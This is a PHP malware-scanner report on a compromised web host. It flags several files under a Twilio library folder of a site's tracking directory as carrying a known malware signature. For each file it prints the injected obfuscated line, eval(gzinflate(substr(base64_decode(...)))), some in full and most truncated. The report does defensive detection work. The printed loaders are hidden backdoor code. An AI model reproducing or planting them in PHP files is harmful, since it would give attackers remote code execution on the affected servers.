<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1STUsDMRC9F/ofBin0w37cIxZEFAoqot7XmJ3aYJqETNZaxf/uZLNrtfXgHJbs5M2bNy/T7XQ7ykgiuMfwqhVS8bDRRrviDikWC3+mOEfnzsbgzJWmSIBvEW15WHG/uE0ALnRVUAgfXSYHjtlolA8wgvOAMiKBBIsb+JNfW4rSKmxrvmsv3uTaG4SK5DOKg+vpFJQrcfJknHoRAvzKH2Dq6Cmj0cbJXCrlqnQg7Sdz7QtZqylUllOYpGcyV7XmwdH19jJwYWm2N3KNR8OTA3rhZZBroBi0fYbesoEXlvEC4gqhTUFKgVtyUvPIHnJraFpDar1PK0OQW+jVPyTYQuIu7EfOM1d9gxEDwWal1QqYmjBoafQ7liBt+dsIYheg1AFVZEXR1Qrza8LZ7WK6ExAwVsHmEbId5Z7EELeeZxT1NonH/67T476Hs3zw1ZPRCpa...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1STUsDMRC9F/ofBin0w37cIxZEFAoqot7XmJ3aYJqETNZaxf/uZLNrtfXgHJbs5M2bNy/T7XQ7ykgiuMfwqhVS8bDRRrviDikWC3+mOEfnzsbgzJWmSIBvEW15WHG/uE0ALnRVUAgfXSYHjtlolA8wgvOAMiKBBIsb+JNfW4rSKmxrvmsv3uTaG4SK5DOKg+vpFJQrcfJknHoRAvzKH2Dq6Cmj0cbJXCrlqnQg7Sdz7QtZqylUllOYpGcyV7XmwdH19jJwYWm2N3KNR8OTA3rhZZBroBi0fYbesoEXlvEC4gqhTUFKgVtyUvPIHnJraFpDar1PK0OQW+jVPyTYQuIu7EfOM1d9gxEDwWal1QqYmjBoafQ7liBt+dsIYheg1AFVZEXR1Qrza8LZ7WK6ExAwVsHmEbId5Z7EELeeZxT1NonH/67T476Hs3zw1ZPRCpa...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/IpAddress.php

Size: 427.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJWQP0/EMAzF90r9Dp473A0wdet4K9wemcSlRiWNYpcDIb476R84GriTyBLZ7+UXP5dFWeyrqiygggaE/WNPcAiNc5FEpvYs7XYQulCjaqxrcKhkbKR0uW9LOseOZg20+wGBEwrk7j+AY3D/AObuLVB4w2ng5hZshxGtUgTRmIImKCqwI6/cMkmqWWB4eCKrF7Bo7TB6NRl+GnOVFuiadiGmYv4D+wvUNjJ5178Zj8+Uc79EmEQY2u0qLhA5GMwMK44DrMrCSvOd93o1+xg5h6XWVcq+LGyPqXVP8YUtiTmeuOfB3JGoOb+gV00Zf9sOXhS9pWQfxmgJ3uGjLD4BPJQ9uLMCAAA='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJWQP0/EMAzF90r9Dp473A0wdet4K9wemcSlRiWNYpcDIb476R84GriTyBLZ7+UXP5dFWeyrqiygggaE/WNPcAiNc5FEpvYs7XYQulCjaqxrcKhkbKR0uW9LOseOZg20+wGBEwrk7j+AY3D/AObuLVB4w2ng5hZshxGtUgTRmIImKCqwI6/cMkmqWWB4eCKrF7Bo7TB6NRl+GnOVFuiadiGmYv4D+wvUNjJ5178Zj8+Uc79EmEQY2u0qLhA5GMwMK44DrMrCSvOd93o1+xg5h6XWVcq+LGyPqXVP8YUtiTmeuOfB3JGoOb+gV00Zf9sOXhS9pWQfxmgJ3uGjLD4BPJQ9uLMCAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJWQP0/EMAzF90r9Dp473A0wdet4K9wemcSlRiWNYpcDIb476R84GriTyBLZ7+UXP5dFWeyrqiygggaE/WNPcAiNc5FEpvYs7XYQulCjaqxrcKhkbKR0uW9LOseOZg20+wGBEwrk7j+AY3D/AObuLVB4w2ng5hZshxGtUgTRmIImKCqwI6/cMkmqWWB4eCKrF7Bo7TB6NRl+GnOVFuiadiGmYv4D+wvUNjJ5178Zj8+Uc79EmEQY2u0qLhA5GMwMK44DrMrCSvOd93o1+xg5h6XWVcq+LGyPqXVP8YUtiTmeuOfB3JGoOb+gV00Zf9sOXhS9pWQfxmgJ3uGjLD4BPJQ9uLMCAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/IpAddresses.php

Size: 715.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJVT32vbMBB+L+R/OIwhP+aka18KHg2EsUGglLL2IW9GkS+xNkUykty0G/vfd5at2G7Wwc4v1unTd999J40uRhdcMmvhEc2z4Gizp6OQQmff0LpsXa7y3KC1aAFfHKr8HPi4frgT1hFeV4Yj/BoRJ1CU1VYKDrtKcSe0gizjWllnKu4mMZcClUsgroyY1megjdgVws6XgpBMccwUOyDcQvRvfdGnjqFkhqjT9P16Lfh3UHo5m7XHZ/DZIHPULgOFRzgVgCAoAE8HvrywQykRKsv2mJ5tLxbAdY7zrdT8R5pCWZRnmKbxRuJ8yTjXVf1jRUlGlBklSEHdjTNaZpLcJof26Cbj1d1msxlPG1gY1XzJfROTYYE6oq+GiuTy9Z5sjRKIrq5vFh/pu4qG4OBRT2VKxrIDkKNC7SHetUx+Qim4AiGkwA9tp43PDn3U2+/I3XukXRsNoyihXf8XHTOGvULsF8TEwBI7zajJ6x3...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVT32vbMBB+L+R/OIwhP+aka18KHg2EsUGglLL2IW9GkS+xNkUykty0G/vfd5at2G7Wwc4v1unTd999J40uRhdcMmvhEc2z4Gizp6OQQmff0LpsXa7y3KC1aAFfHKr8HPi4frgT1hFeV4Yj/BoRJ1CU1VYKDrtKcSe0gizjWllnKu4mMZcClUsgroyY1megjdgVws6XgpBMccwUOyDcQvRvfdGnjqFkhqjT9P16Lfh3UHo5m7XHZ/DZIHPULgOFRzgVgCAoAE8HvrywQykRKsv2mJ5tLxbAdY7zrdT8R5pCWZRnmKbxRuJ8yTjXVf1jRUlGlBklSEHdjTNaZpLcJof26Cbj1d1msxlPG1gY1XzJfROTYYE6oq+GiuTy9Z5sjRKIrq5vFh/pu4qG4OBRT2VKxrIDkKNC7SHetUx+Qim4AiGkwA9tp43PDn3U2+/I3Xu...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVT32vbMBB+L+R/OIwhP+aka18KHg2EsUGglLL2IW9GkS+xNkUykty0G/vfd5at2G7Wwc4v1unTd999J40uRhdcMmvhEc2z4Gizp6OQQmff0LpsXa7y3KC1aAFfHKr8HPi4frgT1hFeV4Yj/BoRJ1CU1VYKDrtKcSe0gizjWllnKu4mMZcClUsgroyY1megjdgVws6XgpBMccwUOyDcQvRvfdGnjqFkhqjT9P16Lfh3UHo5m7XHZ/DZIHPULgOFRzgVgCAoAE8HvrywQykRKsv2mJ5tLxbAdY7zrdT8R5pCWZRnmKbxRuJ8yTjXVf1jRUlGlBklSEHdjTNaZpLcJof26Cbj1d1msxlPG1gY1XzJfROTYYE6oq+GiuTy9Z5sjRKIrq5vFh/pu4qG4OBRT2VKxrIDkKNC7SHetUx+Qim4AiGkwA9tp43PDn3U2+/I3Xu...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Media.php

Size: 711.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAIVTUWvbMBB+N/g/HCawNWTWe9oGBmNQ2PawFfboKPK5uc2WjHSK15X+953lJHU3wmQjW76777777pxneaaWyzyDJbyHlgKDa2BtWh3CevsZa9Jw8w39gQyG6n6gllz1FQNXyXZnA2trcLMFt/uBhkOZoD46D7xHqLEhS0wHBI8NehTfFQTEZN1OeDCl+TQm/+BM7NCyZnI2Qd3smfuwVmoYhpJTQGlcp2pngtI9KS9sVDdCbLZVSq/yLBUAl4kD/mK09b8uIwtxc9EbhKc8Gy+QpRTc7ymA3O6A3lNdo4UdGh3DVE0S7yc+Atl0PhYn9HpnA55hBKFIdKsxoliBdXz8UpSTVx93LRloojWjDvCAZ05fdIdvF0b2ln5jDbfQ6Dbg1RT4ND3GRQ3M/K7mpnF55OgtFEmNseji+sXhGVAwL4XMyM9jptfnmWDfETpto27bR+k5J1XoODFghRrsZSQgOLHoydxrmRE+Ixh...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAIVTUWvbMBB+N/g/HCawNWTWe9oGBmNQ2PawFfboKPK5uc2WjHSK15X+953lJHU3wmQjW76777777pxneaaWyzyDJbyHlgKDa2BtWh3CevsZa9Jw8w39gQyG6n6gllz1FQNXyXZnA2trcLMFt/uBhkOZoD46D7xHqLEhS0wHBI8NehTfFQTEZN1OeDCl+TQm/+BM7NCyZnI2Qd3smfuwVmoYhpJTQGlcp2pngtI9KS9sVDdCbLZVSq/yLBUAl4kD/mK09b8uIwtxc9EbhKc8Gy+QpRTc7ymA3O6A3lNdo4UdGh3DVE0S7yc+Atl0PhYn9HpnA55hBKFIdKsxoliBdXz8UpSTVx93LRloojWjDvCAZ05fdIdvF0b2ln5jDbfQ6Dbg1RT4ND3GRQ3M/K7mpnF55OgtFEmNseji+sXhGVAwL4XMyM9jptfnmWDfETpto27...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAIVTUWvbMBB+N/g/HCawNWTWe9oGBmNQ2PawFfboKPK5uc2WjHSK15X+953lJHU3wmQjW76777777pxneaaWyzyDJbyHlgKDa2BtWh3CevsZa9Jw8w39gQyG6n6gllz1FQNXyXZnA2trcLMFt/uBhkOZoD46D7xHqLEhS0wHBI8NehTfFQTEZN1OeDCl+TQm/+BM7NCyZnI2Qd3smfuwVmoYhpJTQGlcp2pngtI9KS9sVDdCbLZVSq/yLBUAl4kD/mK09b8uIwtxc9EbhKc8Gy+QpRTc7ymA3O6A3lNdo4UdGh3DVE0S7yc+Atl0PhYn9HpnA55hBKFIdKsxoliBdXz8UpSTVx93LRloojWjDvCAZ05fdIdvF0b2ln5jDbfQ6Dbg1RT4ND3GRQ3M/K7mpnF55OgtFEmNseji+sXhGVAwL4XMyM9jptfnmWDfETpto27...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/MediaInstance.php

Size: 627.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI2STW/bMAyG7wb8H3gokC7I7MN28rYCBYYCPfSy9a6qFN2ocCRBousOw/77KNlZm3QBKvgS8uXDj7x1VVftel1XsIZLSNY9DAQ3ZKwGf/9IyA1c+Qi8JTDUW2fZPhFE6imSQ9pAIirZu9vJDtbPtQX33eO4I8earXfwdcscUte20zQ1XLQN+l1rPKZWB9tGStzucvXFnWoyoVCaBsI2dJo5dp0MaP5l5F3Cp8+AWx01MkVIHGUBGUczWCOtbW8pyW+blm1OYDWiHx2rd+EjBZk100sv2lfPfXOiRHeUkn6gEx2Dlvu9aXgrdRIC379GzGCMpJnMvE2506kjGdGpRX5Mz7kD9qQTHGv/gxuDeTfuWHuIQ+84r86/Ah3jltzHnHs5wn7Vtq5w0CnBT4pPFimp2XPqh1hHFeNdu8RafAn0LCDzVroXSIkfowh/C1leGO8Hi9CPDotdlZJZ5A8fkc/PcLAy1QbOxmg/7Cv...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI2STW/bMAyG7wb8H3gokC7I7MN28rYCBYYCPfSy9a6qFN2ocCRBousOw/77KNlZm3QBKvgS8uXDj7x1VVftel1XsIZLSNY9DAQ3ZKwGf/9IyA1c+Qi8JTDUW2fZPhFE6imSQ9pAIirZu9vJDtbPtQX33eO4I8earXfwdcscUte20zQ1XLQN+l1rPKZWB9tGStzucvXFnWoyoVCaBsI2dJo5dp0MaP5l5F3Cp8+AWx01MkVIHGUBGUczWCOtbW8pyW+blm1OYDWiHx2rd+EjBZk100sv2lfPfXOiRHeUkn6gEx2Dlvu9aXgrdRIC379GzGCMpJnMvE2506kjGdGpRX5Mz7kD9qQTHGv/gxuDeTfuWHuIQ+84r86/Ah3jltzHnHs5wn7Vtq5w0CnBT4pPFimp2XPqh1hHFeNdu8RafAn0LCDzVroXSIkfowh/C1leGO8...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI2STW/bMAyG7wb8H3gokC7I7MN28rYCBYYCPfSy9a6qFN2ocCRBousOw/77KNlZm3QBKvgS8uXDj7x1VVftel1XsIZLSNY9DAQ3ZKwGf/9IyA1c+Qi8JTDUW2fZPhFE6imSQ9pAIirZu9vJDtbPtQX33eO4I8earXfwdcscUte20zQ1XLQN+l1rPKZWB9tGStzucvXFnWoyoVCaBsI2dJo5dp0MaP5l5F3Cp8+AWx01MkVIHGUBGUczWCOtbW8pyW+blm1OYDWiHx2rd+EjBZk100sv2lfPfXOiRHeUkn6gEx2Dlvu9aXgrdRIC379GzGCMpJnMvE2506kjGdGpRX5Mz7kD9qQTHGv/gxuDeTfuWHuIQ+84r86/Ah3jltzHnHs5wn7Vtq5w0CnBT4pPFimp2XPqh1hHFeNdu8RafAn0LCDzVroXSIkfowh/C1leGO8...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Member.php

Size: 487.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH2QwW7CMAyG75X6Dj5MakEV3JmYdthhk4aGoJxRSN01Upp2jjOG0N59adMBY9qsHGL59//ZjqM4klpYC2ukdyXRbvO90qrZrtDydoH1DimOwAd+MJrit/DJWBZGom9oHEmMo2MchZbpeBw+MIYHfHPoELhSFuoLXzhr7ltBogbLpMwr3DjSkFcIHlRr2KyegRtotThA2dClUQaiZCQ4GfVRBGJnxRXWf1Fq5KopetBjni9hyD3KWYR9hQZKZFkNPsM0P1F+tonfsBROs+1aly/rfHImErIj89+Ne/4wcXF1n2n4tG6nlYTSGcmqMd/qtLtTdtpjDkkHT0ZwHPp9DHyLupzNXFsIxlQQiUN61nSRbEgnML/rb59d1RY9IJQD7EIxGt2G5DOO/PsCEvLsplgCAAA='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2QwW7CMAyG75X6Dj5MakEV3JmYdthhk4aGoJxRSN01Upp2jjOG0N59adMBY9qsHGL59//ZjqM4klpYC2ukdyXRbvO90qrZrtDydoH1DimOwAd+MJrit/DJWBZGom9oHEmMo2MchZbpeBw+MIYHfHPoELhSFuoLXzhr7ltBogbLpMwr3DjSkFcIHlRr2KyegRtotThA2dClUQaiZCQ4GfVRBGJnxRXWf1Fq5KopetBjni9hyD3KWYR9hQZKZFkNPsM0P1F+tonfsBROs+1aly/rfHImErIj89+Ne/4wcXF1n2n4tG6nlYTSGcmqMd/qtLtTdtpjDkkHT0ZwHPp9DHyLupzNXFsIxlQQiUN61nSRbEgnML/rb59d1RY9IJQD7EIxGt2G5DOO/PsCEvLsplgCAAA=')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2QwW7CMAyG75X6Dj5MakEV3JmYdthhk4aGoJxRSN01Upp2jjOG0N59adMBY9qsHGL59//ZjqM4klpYC2ukdyXRbvO90qrZrtDydoH1DimOwAd+MJrit/DJWBZGom9oHEmMo2MchZbpeBw+MIYHfHPoELhSFuoLXzhr7ltBogbLpMwr3DjSkFcIHlRr2KyegRtotThA2dClUQaiZCQ4GfVRBGJnxRXWf1Fq5KopetBjni9hyD3KWYR9hQZKZFkNPsM0P1F+tonfsBROs+1aly/rfHImErIj89+Ne/4wcXF1n2n4tG6nlYTSGcmqMd/qtLtTdtpjDkkHT0ZwHPp9DHyLupzNXFsIxlQQiUN61nSRbEgnML/rb59d1RY9IJQD7EIxGt2G5DOO/PsCEvLsplgCAAA='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Members.php

Size: 651.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI1TTW/UMBC9R8p/mEOl7K7KRsBtqwISKocKtlW3nCOvM4Ghjh3sCWVB/HcmdrJd9Uv1IbInz++9ebbzLM+0USHABv0v0hiq61sy5KorDFx9wXaLPuQZyMDfjLZ+iPxMgQXteq8xz/4mcLlYpAks4Aq59xb4O0IbCUFxXDXeWQbXxMXPHntcwtoxyloQyu7AdegVk7MB9nRSapxvsQaXSJNL8FFGykLbyg8K0PRWD7tBnBroA0Z8+Snq7gm/ejoG6/iArAjwURmzoXo5wfbwD0noucTg+gW9ToRlmnT91pC+sxw3zOYwBjqMUdjiLRwN/b16Rzawshorq1qcjUVtCC0fT5jeEyyhSF0X85PE9y/PppOCS+WZNHXKcgDlEagWAmpIwtzupiRSRoZuJKSz12/ePun8G/LF9gdqFsX2PDg7O+qUV20QS1RfDlM4hSJQXTzWnmBFfbV6hqbQYqmKBPfbecTMdDnXMSMtX0N...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1TTW/UMBC9R8p/mEOl7K7KRsBtqwISKocKtlW3nCOvM4Ghjh3sCWVB/HcmdrJd9Uv1IbInz++9ebbzLM+0USHABv0v0hiq61sy5KorDFx9wXaLPuQZyMDfjLZ+iPxMgQXteq8xz/4mcLlYpAks4Aq59xb4O0IbCUFxXDXeWQbXxMXPHntcwtoxyloQyu7AdegVk7MB9nRSapxvsQaXSJNL8FFGykLbyg8K0PRWD7tBnBroA0Z8+Snq7gm/ejoG6/iArAjwURmzoXo5wfbwD0noucTg+gW9ToRlmnT91pC+sxw3zOYwBjqMUdjiLRwN/b16Rzawshorq1qcjUVtCC0fT5jeEyyhSF0X85PE9y/PppOCS+WZNHXKcgDlEagWAmpIwtzupiRSRoZuJKSz12/ePun8G/LF9gdqFsX2PDg7O+qUV20QS1RfDlM4hSJQXTz...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1TTW/UMBC9R8p/mEOl7K7KRsBtqwISKocKtlW3nCOvM4Ghjh3sCWVB/HcmdrJd9Uv1IbInz++9ebbzLM+0USHABv0v0hiq61sy5KorDFx9wXaLPuQZyMDfjLZ+iPxMgQXteq8xz/4mcLlYpAks4Aq59xb4O0IbCUFxXDXeWQbXxMXPHntcwtoxyloQyu7AdegVk7MB9nRSapxvsQaXSJNL8FFGykLbyg8K0PRWD7tBnBroA0Z8+Snq7gm/ejoG6/iArAjwURmzoXo5wfbwD0noucTg+gW9ToRlmnT91pC+sxw3zOYwBjqMUdjiLRwN/b16Rzawshorq1qcjUVtCC0fT5jeEyyhSF0X85PE9y/PppOCS+WZNHXKcgDlEagWAmpIwtzupiRSRoZuJKSz12/ePun8G/LF9gdqFsX2PDg7O+qUV20QS1RfDlM4hSJQXTz...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Message.php

Size: 627.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI2Tz0/rMAzH75X6P/gwiW3ix+G905CQOHLgAtyrLPFWozapYpeB0Pvfn9OWQQsFrEpNY+djf+00z/LsYr3OM1jDNTD5fYVwi8xmj2mzc5yfQ1M2GyMSNxtwRrCwEfXljiFqDyV2PhBd1D0CDoZhGvsFrm3cr3HT2DGOaUS5hj9/wZYmGisYgSWqREUaAXLohXaErN/EELaPaGUGa6wNrZdigk9FDq4eytitjhXP4LbBvUw5aQ/C7henfVsXjPtac/GUor6tClUO1/zG0aYxOpAADit6Ur8MCb/JUKMjM4/v3L1oE7ULzMFSGgwcSMouAdXzGrjdRuTQRqvTj/RJxwc/fwGnozZYPrYsemdTOWZofki9Wc2k3sVQz+gagdNl6+Y5OjBmSZiSmjL4H3j9oYs8s5Uqg3uMT6Qyi4cDVRSKO2Qphn8Q8FnQu89BN57FeIt3Q5PgVZlqTQyi11g7tWu9FQoeyJMsF7YizX0...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI2Tz0/rMAzH75X6P/gwiW3ix+G905CQOHLgAtyrLPFWozapYpeB0Pvfn9OWQQsFrEpNY+djf+00z/LsYr3OM1jDNTD5fYVwi8xmj2mzc5yfQ1M2GyMSNxtwRrCwEfXljiFqDyV2PhBd1D0CDoZhGvsFrm3cr3HT2DGOaUS5hj9/wZYmGisYgSWqREUaAXLohXaErN/EELaPaGUGa6wNrZdigk9FDq4eytitjhXP4LbBvUw5aQ/C7henfVsXjPtac/GUor6tClUO1/zG0aYxOpAADit6Ur8MCb/JUKMjM4/v3L1oE7ULzMFSGgwcSMouAdXzGrjdRuTQRqvTj/RJxwc/fwGnozZYPrYsemdTOWZofki9Wc2k3sVQz+gagdNl6+Y5OjBmSZiSmjL4H3j9oYs8s5Uqg3uMT6Qyi4cDVRSKO2Qphn8Q8FnQu89BN57FeIt...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI2Tz0/rMAzH75X6P/gwiW3ix+G905CQOHLgAtyrLPFWozapYpeB0Pvfn9OWQQsFrEpNY+djf+00z/LsYr3OM1jDNTD5fYVwi8xmj2mzc5yfQ1M2GyMSNxtwRrCwEfXljiFqDyV2PhBd1D0CDoZhGvsFrm3cr3HT2DGOaUS5hj9/wZYmGisYgSWqREUaAXLohXaErN/EELaPaGUGa6wNrZdigk9FDq4eytitjhXP4LbBvUw5aQ/C7henfVsXjPtac/GUor6tClUO1/zG0aYxOpAADit6Ur8MCb/JUKMjM4/v3L1oE7ULzMFSGgwcSMouAdXzGrjdRuTQRqvTj/RJxwc/fwGnozZYPrYsemdTOWZofki9Wc2k3sVQz+gagdNl6+Y5OjBmSZiSmjL4H3j9oYs8s5Uqg3uMT6Qyi4cDVRSKO2Qphn8Q8FnQu89BN57FeIt...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Messages.php

Size: 1.44 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAKVWbWvjRhD+fpD/MA2hsnOK3bSXvqgkkIYrHFxouPgopRRnLY3jJatdVbu6xFfuv3dmV+920g81gcja2Xl55plnfPDq4FWqhLVwi+UnmaJdLh6lkmb5Aa1bXqO14h4t4JNDne1avZfWkaWpyhThnwPyBvSZHx+HBziGqxKFQxCg8RFqfyC1dUKn2Fi11m+fRF4ohIrNkp3j2QxSk+HJSpn0IUmg2BQ7Nv5zlCqJ2p1ciDQ1FT/kdSknF6nPaCLKUmwnw2v8OfzFZNtDOL+Aw7Uxh/Eei19LkweL16dvTr85Ozs7/fa7N3tNF2Zo+P0PP/40NpxOf96pIilEKXLwScKR/2ITQtFKfU/4hPdmDf4EHZYWHjcy3YC0YLGUQsnPmIHQ2TCWJVQgkyWmTm3BGXAbhNBMuLx5N4M/TAU5+V5LnYF0gMJKLNmyssjWO/6ypqsbVAWZcnNRZJyd21A660qnTho9Gxc5Dw9FtVI...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVWbWvjRhD+fpD/MA2hsnOK3bSXvqgkkIYrHFxouPgopRRnLY3jJatdVbu6xFfuv3dmV+920g81gcja2Xl55plnfPDq4FWqhLVwi+UnmaJdLh6lkmb5Aa1bXqO14h4t4JNDne1avZfWkaWpyhThnwPyBvSZHx+HBziGqxKFQxCg8RFqfyC1dUKn2Fi11m+fRF4ohIrNkp3j2QxSk+HJSpn0IUmg2BQ7Nv5zlCqJ2p1ciDQ1FT/kdSknF6nPaCLKUmwnw2v8OfzFZNtDOL+Aw7Uxh/Eei19LkweL16dvTr85Ozs7/fa7N3tNF2Zo+P0PP/40NpxOf96pIilEKXLwScKR/2ITQtFKfU/4hPdmDf4EHZYWHjcy3YC0YLGUQsnPmIHQ2TCWJVQgkyWmTm3BGXAbhNBMuLx5N4M/TAU5+V5LnYF0gMJKLNmyssjWO/6ypqs...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVWbWvjRhD+fpD/MA2hsnOK3bSXvqgkkIYrHFxouPgopRRnLY3jJatdVbu6xFfuv3dmV+920g81gcja2Xl55plnfPDq4FWqhLVwi+UnmaJdLh6lkmb5Aa1bXqO14h4t4JNDne1avZfWkaWpyhThnwPyBvSZHx+HBziGqxKFQxCg8RFqfyC1dUKn2Fi11m+fRF4ohIrNkp3j2QxSk+HJSpn0IUmg2BQ7Nv5zlCqJ2p1ciDQ1FT/kdSknF6nPaCLKUmwnw2v8OfzFZNtDOL+Aw7Uxh/Eei19LkweL16dvTr85Ozs7/fa7N3tNF2Zo+P0PP/40NpxOf96pIilEKXLwScKR/2ITQtFKfU/4hPdmDf4EHZYWHjcy3YC0YLGUQsnPmIHQ2TCWJVQgkyWmTm3BGXAbhNBMuLx5N4M/TAU5+V5LnYF0gMJKLNmyssjWO/6ypqs...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Notification.php

Size: 195.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAGXLPQqAMAxA4T2QO/Q6Lg7avZQYIVASaOIPiHe3u2/+HgICteqeVu6nEHvJlzSxsrBHmS1kF6ohpghpxHewbn8+qUdV4rHZ0YkRHoQX4QPJPJNWYQAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

